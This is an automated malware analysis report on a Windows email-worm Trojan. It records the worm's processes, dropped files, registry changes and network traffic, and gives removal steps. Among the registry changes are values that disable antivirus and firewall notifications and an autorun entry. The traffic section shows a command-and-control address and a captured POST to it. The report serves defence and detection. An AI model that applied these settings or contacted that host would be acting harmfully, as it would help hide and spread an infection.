Trojan.Win32.Agent.neuywn (Kaspersky), Gen:Variant.Razy.18266 (B) (Emsisoft), Gen:Variant.Razy.18266 (AdAware), Trojan.Win32.Swrort.3.FD, GenericEmailWorm.YR (Lavasoft MAS)Behaviour: Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 32166e28f6de4ff8037bfabcd51d2d25
SHA1: f8de1c951489bbe86b456f398a71347b72c6817e
SHA256: 96ca34eb189bb9c414fb9de29c193e319e0ed6d6587ead694f594bd66139e954
SSDeep: 24576:FQzGMgkNr2nsM/Gs wb1Ycpy0XlNS pv hM:2zBa2N00XlQC m
Size: 1093120 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-21 03:12:20
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
smtp_mailer.exe:1760
ke7qslsbgtc2eo.exe:384
ke7qslsbgtbteo.exe:1180
zip.exe:1140
zip.exe:1160
zip.exe:1944
zip.exe:1472
zip.exe:260
zip.exe:828
zip.exe:412
ke7qslsbgtbweo.exe:1132
sbgtbveo.exe:1268
sbgtbveo.exe:572
sbgtbveo.exe:1088
sbgtbveo.exe:1668
sbgtbveo.exe:436
sbgtbveo.exe:1868
unzip.exe:656
unzip.exe:1472
ke7qsl3r0f2aeouizjy9l.exe:1772
ke7qslsbgtc3eo.exe:508
sbgtc5eo.exe:412
qtvtnsadc.exe:628
qtvtnsadc.exe:1748
qtvtnsadc.exe:264
win32blot2.exe:1920
%original file name%.exe:188
abhdqfjyr.exe:1364
abhdqfjyr.exe:1656
win32purst2.exe:1492
ke7qslsbgtbueo.exe:1492
ke7qslsbgtbueo.exe:460
yac32sse41b.exe:1968
The Trojan injects its code into the following process(es):
ke7qslsbgtc4eo.exe:1128
unzip.exe:1128
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process smtp_mailer.exe:1760 makes changes in the file system.
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\sbgtbz.txt (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc0.txt (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbx.txt (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc1.txt (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtby.txt (0 bytes)
The process ke7qslsbgtc2eo.exe:384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
The process zip.exe:1140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia01140 (13096 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\cameron.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\71melinda.zip (0 bytes)
The process zip.exe:1160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia01160 (13052 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\justin.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\82adam.zip (0 bytes)
The process zip.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia01944 (12866 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\galen82.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\garnette.exe (0 bytes)
The process zip.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia01472 (13051 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\23hugh.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\bill.exe (0 bytes)
The process zip.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia00260 (13040 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\wilmer89.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\corinne.exe (0 bytes)
The process zip.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia00828 (13058 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\dyer.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\83ariella.zip (0 bytes)
The process zip.exe:412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\zia00412 (13076 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\tmp\pearlie.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\trinity67.zip (0 bytes)
The process sbgtbveo.exe:1268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\cameron.exe (5506 bytes)
The process sbgtbveo.exe:572 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\justin.exe (5506 bytes)
The process sbgtbveo.exe:1088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\dyer.exe (5506 bytes)
The process sbgtbveo.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\bill.exe (5506 bytes)
The process sbgtbveo.exe:436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\corinne.exe (5506 bytes)
The process sbgtbveo.exe:1868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\pearlie.exe (5506 bytes)
The process unzip.exe:1128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\smtp_mailer.exe (5873 bytes)
%System%\nkpkpudssleie\smtp\zip.exe (1425 bytes)
The process unzip.exe:656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\p2p_04\yac\yac32avx10b.exe (601 bytes)
%System%\p2p_04\win64\win64purst2.exe (673 bytes)
%System%\p2p_04\yac\yac64sse41b.exe (673 bytes)
%System%\p2p_04\yac\yac32sse41b.exe (601 bytes)
%System%\p2p_04\win64\win64blot2.exe (673 bytes)
%System%\p2p_04\yac\yac32fast.exe (601 bytes)
%System%\p2p_04\yac\yac64fast.exe (673 bytes)
%System%\p2p_04\yac\yac64avx10b.exe (673 bytes)
%System%\p2p_04\yac\yac64sse20b.exe (673 bytes)
%System%\p2p_04\yac\yac32sse20b.exe (601 bytes)
%System%\p2p_04\win32\win32purst2.exe (673 bytes)
%System%\p2p_04\win32\win32blot2.exe (673 bytes)
The process unzip.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\smtp_mailer.exe (5873 bytes)
%System%\nkpkpudssleie\smtp\zip.exe (1425 bytes)
The Trojan deletes the following file(s):
%System%\nkpkpudssleie\smtp\smtp_mailer.exe (0 bytes)
%System%\nkpkpudssleie\smtp\zip.exe (0 bytes)
The process ke7qsl3r0f2aeouizjy9l.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
%System%\abhdqfjyr.exe (7433 bytes)
The process sbgtc5eo.exe:412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\garnette.exe (3703 bytes)
The process qtvtnsadc.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
The process qtvtnsadc.exe:1748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
The process qtvtnsadc.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
The process %original file name%.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ke7qsl3r0f2aeouizjy9l.exe (5442 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ke7qsl3r0f2aeouizjy9l.exe (0 bytes)
The process abhdqfjyr.exe:1364 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\smtp\tmp\sbgtc0.txt (342 bytes)
%System%\nkpkpudssleie\run (10 bytes)
%System%\p2p_04.zip (20060 bytes)
%WinDir%\Temp\ke7qslsbgtbteo.exe (35 bytes)
%System%\nkpkpudssleie\tst (10 bytes)
%System%\nkpkpudssleie\cfg (230 bytes)
%System%\nkpkpudssleie\por (1 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbx.txt (342 bytes)
%System%\nkpkpudssleie\rng (92 bytes)
%System%\unzip.exe (7100 bytes)
%WinDir%\Temp\ke7qslsbgtc4eo.exe (1940 bytes)
%System%\nkpkpudssleie\smtp\smtp_mailer.zip (15540 bytes)
%System%\qtvtnsadc.exe (7433 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbz.txt (342 bytes)
%WinDir%\Temp\ke7qslsbgtbueo.exe (35 bytes)
%WinDir%\Temp\ke7qslsbgtbweo.exe (2820 bytes)
%WinDir%\Temp\sbgtbveo.exe (2820 bytes)
%WinDir%\Temp\ke7qslsbgtc2eo.exe (7433 bytes)
%WinDir%\Temp\sbgtc5eo.exe (2820 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtby.txt (340 bytes)
%WinDir%\Temp\ke7qslsbgtc3eo.exe (35 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc1.txt (340 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\sbgtbveo.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\83ariella.zip (0 bytes)
%WinDir%\Temp\ke7qslsbgtc2eo.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\trinity67.zip (0 bytes)
%WinDir%\Temp\ke7qslsbgtbweo.exe (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\23hugh.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\82adam.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\71melinda.zip (0 bytes)
%System%\nkpkpudssleie\smtp\tmp\wilmer89.zip (0 bytes)
%WinDir%\Temp\ke7qslsbgtc3eo.exe (0 bytes)
%WinDir%\Temp\ke7qslsbgtbueo.exe (0 bytes)
%WinDir%\Temp\ke7qslsbgtbteo.exe (0 bytes)
The process abhdqfjyr.exe:1656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\nkpkpudssleie\tst (10 bytes)
Registry activity
The process smtp_mailer.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 9D A2 98 51 91 CF FB 4B 3A 17 E4 F8 A1 AC 05"
The process ke7qslsbgtc2eo.exe:384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 88 E0 A6 A9 96 96 A9 71 9E 79 3E F9 DF DB CD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process ke7qslsbgtbteo.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 81 6F AB 8A D1 B6 78 86 B8 45 7E D3 D7 E7 AC"
The process ke7qslsbgtc4eo.exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 2B 3C BA 2C 92 CB 9F 40 59 D5 41 30 8B EE B2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process ke7qslsbgtbweo.exe:1132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
The process sbgtbveo.exe:1268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A C1 6D C3 61 56 C2 4D 2A F3 AC 7E 9F 13 B7 C2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 1D 29 61 A2 F7 F5 CB FD 74 96 5C A3 3A EE E6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 1D 20 75 B6 19 08 27 35 F0 60 11 CA 1F FE B2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 93 C7 77 68 84 FA D1 4D BE FC 81 CC B1 40 BF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 EF 76 67 6F 1D 6F F9 B3 69 7F 01 2B 2D CA 31"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process sbgtbveo.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 13 CA 1E CF 08 98 CD 00 50 B3 C8 AE BD 22 67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process unzip.exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 4D 70 D2 DB A2 03 8F A8 98 08 CC 20 5D 64 A7"
The process unzip.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 5D 3A B8 6B E1 A5 84 5F 4C 00 2E 2D 08 6E 22"
The process unzip.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 7C F8 C2 AF 23 35 45 2F 9C E2 14 54 2C 98 2C"
The process ke7qsl3r0f2aeouizjy9l.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 00 26 B3 B1 C4 58 19 CD 43 4B 0C 39 7A 50 17"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Discovery Removal BranchCache" = "%System%\abhdqfjyr.exe"
The process ke7qslsbgtc3eo.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 80 EE 80 67 AF DD D1 86 2E 3E 9F FF D3 BC A3"
The process sbgtc5eo.exe:412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 05 01 E3 A4 F5 CB 19 32 A9 44 F9 ED C3 97 2E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process qtvtnsadc.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F0 C7 8C E4 FA 70 B9 68 8F 14 D0 2B 08 2D 91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process qtvtnsadc.exe:1748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 5A D2 95 84 FD 70 C6 86 F2 F1 93 B3 1A FE 5E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process qtvtnsadc.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 4A 06 9C A0 B5 2D 35 A9 E5 DC EF E6 2E E9 50"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process win32blot2.exe:1920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
The process %original file name%.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 1F E2 C4 87 4F AF 60 30 5A B4 6B 2A 95 3D D5"
The process abhdqfjyr.exe:1364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 1C 17 8F 05 A9 21 D2 87 81 E9 A6 28 4F B0 33"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The process abhdqfjyr.exe:1656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 94 C3 95 47 8C 36 2E 21 1F 0C FA 36 89 A4 F5"
The process win32purst2.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 3F AE 00 9F B1 7C F0 15 E3 54 E8 75 3C 6C 30"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process ke7qslsbgtbueo.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 E1 C0 07 E0 B6 44 EE BC 08 31 48 69 D2 D2 56"
The process ke7qslsbgtbueo.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 5E 2B B8 E8 68 7D 46 05 95 83 57 33 D0 25 C8"
The process yac32sse41b.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A F0 3E 3A 09 38 97 B8 A3 81 CF 75 98 9A A6 8B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
| MD5 | File path |
|---|---|
| 476f447617f65eebf35c52d4fd3b3188 | c:\WINDOWS\Temp\ke7qslsbgtc3eo.exe |
| 0389ca220feefd1f68837d7de57e3ddc | c:\WINDOWS\system32\nkpkpudssleie\smtp\smtp_mailer.exe |
| 79aef4a7acaeb0e979537a4bc3dcc851 | c:\WINDOWS\system32\nkpkpudssleie\smtp\zip.exe |
| bcbd415aead5db5389009791cebaeeaa | c:\WINDOWS\system32\p2p_04\win32\win32blot2.exe |
| b4532e749d37ad30d2890607b0cc1e78 | c:\WINDOWS\system32\p2p_04\win32\win32purst2.exe |
| 469ac28bc4ae228f7e0eb7b712fc2964 | c:\WINDOWS\system32\p2p_04\win64\win64blot2.exe |
| 08e607d95b78967531e5eb6d87d1ab8e | c:\WINDOWS\system32\p2p_04\win64\win64purst2.exe |
| a01b41d1547b7a687958a9a2248fd428 | c:\WINDOWS\system32\p2p_04\yac\yac32avx10b.exe |
| 90dee4efb3473ec8e49bcc10b2d4c12c | c:\WINDOWS\system32\p2p_04\yac\yac32fast.exe |
| 1b44825e7ee9f271f8750fcf2c28e200 | c:\WINDOWS\system32\p2p_04\yac\yac32sse20b.exe |
| c432b8a3010f07235750b1a79beb3b8b | c:\WINDOWS\system32\p2p_04\yac\yac32sse41b.exe |
| d5e071cba1b33f46cae500619e918f50 | c:\WINDOWS\system32\p2p_04\yac\yac64avx10b.exe |
| 0e41ebe706ffbd5ad2dd1e1ace2482a5 | c:\WINDOWS\system32\p2p_04\yac\yac64fast.exe |
| 4040c4ac7173b9fe5f4c64a09cd95c7c | c:\WINDOWS\system32\p2p_04\yac\yac64sse20b.exe |
| 2c24c2172eb721fd09498c4e0490305e | c:\WINDOWS\system32\p2p_04\yac\yac64sse41b.exe |
| fecf803f7d84d4cfa81277298574d6e6 | c:\WINDOWS\system32\unzip.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
smtp_mailer.exe:1760
ke7qslsbgtc2eo.exe:384
ke7qslsbgtbteo.exe:1180
zip.exe:1140
zip.exe:1160
zip.exe:1944
zip.exe:1472
zip.exe:260
zip.exe:828
zip.exe:412
ke7qslsbgtbweo.exe:1132
sbgtbveo.exe:1268
sbgtbveo.exe:572
sbgtbveo.exe:1088
sbgtbveo.exe:1668
sbgtbveo.exe:436
sbgtbveo.exe:1868
unzip.exe:656
unzip.exe:1472
ke7qsl3r0f2aeouizjy9l.exe:1772
ke7qslsbgtc3eo.exe:508
sbgtc5eo.exe:412
qtvtnsadc.exe:628
qtvtnsadc.exe:1748
qtvtnsadc.exe:264
win32blot2.exe:1920
%original file name%.exe:188
abhdqfjyr.exe:1364
abhdqfjyr.exe:1656
win32purst2.exe:1492
ke7qslsbgtbueo.exe:1492
ke7qslsbgtbueo.exe:460
yac32sse41b.exe:1968 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\nkpkpudssleie\tst (10 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia01140 (13096 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia01160 (13052 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia01944 (12866 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia01472 (13051 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia00260 (13040 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia00828 (13058 bytes)
%System%\nkpkpudssleie\smtp\tmp\zia00412 (13076 bytes)
%System%\nkpkpudssleie\smtp\tmp\cameron.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\justin.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\dyer.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\bill.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\corinne.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\tmp\pearlie.exe (5506 bytes)
%System%\nkpkpudssleie\smtp\smtp_mailer.exe (5873 bytes)
%System%\nkpkpudssleie\smtp\zip.exe (1425 bytes)
%System%\p2p_04\yac\yac32avx10b.exe (601 bytes)
%System%\p2p_04\win64\win64purst2.exe (673 bytes)
%System%\p2p_04\yac\yac64sse41b.exe (673 bytes)
%System%\p2p_04\yac\yac32sse41b.exe (601 bytes)
%System%\p2p_04\win64\win64blot2.exe (673 bytes)
%System%\p2p_04\yac\yac32fast.exe (601 bytes)
%System%\p2p_04\yac\yac64fast.exe (673 bytes)
%System%\p2p_04\yac\yac64avx10b.exe (673 bytes)
%System%\p2p_04\yac\yac64sse20b.exe (673 bytes)
%System%\p2p_04\yac\yac32sse20b.exe (601 bytes)
%System%\p2p_04\win32\win32purst2.exe (673 bytes)
%System%\p2p_04\win32\win32blot2.exe (673 bytes)
%System%\abhdqfjyr.exe (7433 bytes)
%System%\nkpkpudssleie\smtp\tmp\garnette.exe (3703 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ke7qsl3r0f2aeouizjy9l.exe (5442 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc0.txt (342 bytes)
%System%\nkpkpudssleie\run (10 bytes)
%System%\p2p_04.zip (20060 bytes)
%WinDir%\Temp\ke7qslsbgtbteo.exe (35 bytes)
%System%\nkpkpudssleie\cfg (230 bytes)
%System%\nkpkpudssleie\por (1 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbx.txt (342 bytes)
%System%\nkpkpudssleie\rng (92 bytes)
%System%\unzip.exe (7100 bytes)
%WinDir%\Temp\ke7qslsbgtc4eo.exe (1940 bytes)
%System%\nkpkpudssleie\smtp\smtp_mailer.zip (15540 bytes)
%System%\qtvtnsadc.exe (7433 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtbz.txt (342 bytes)
%WinDir%\Temp\ke7qslsbgtbueo.exe (35 bytes)
%WinDir%\Temp\ke7qslsbgtbweo.exe (2820 bytes)
%WinDir%\Temp\sbgtbveo.exe (2820 bytes)
%WinDir%\Temp\ke7qslsbgtc2eo.exe (7433 bytes)
%WinDir%\Temp\sbgtc5eo.exe (2820 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtby.txt (340 bytes)
%WinDir%\Temp\ke7qslsbgtc3eo.exe (35 bytes)
%System%\nkpkpudssleie\smtp\tmp\sbgtc1.txt (340 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Discovery Removal BranchCache" = "%System%\abhdqfjyr.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 966838 | 967168 | 4.85414 | 1a001072b2a30164896c0722ae7fc7c3 |
| .rdata | 974848 | 24220 | 24576 | 2.60903 | 9e6f1d153121d51b8ce97e7c738a5fb1 |
| .data | 999424 | 195856 | 5120 | 2.21568 | b273418e7f6192fc2d5b5d807ef30abf |
| .reloc | 1196032 | 95140 | 95232 | 4.73261 | 13e2f6958b7681ac3caec052fce286f2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://185.106.120.168/index.php | |
| smtp.carpenteriadiciccio.it | 62.149.128.203 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: 185.106.120.168
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
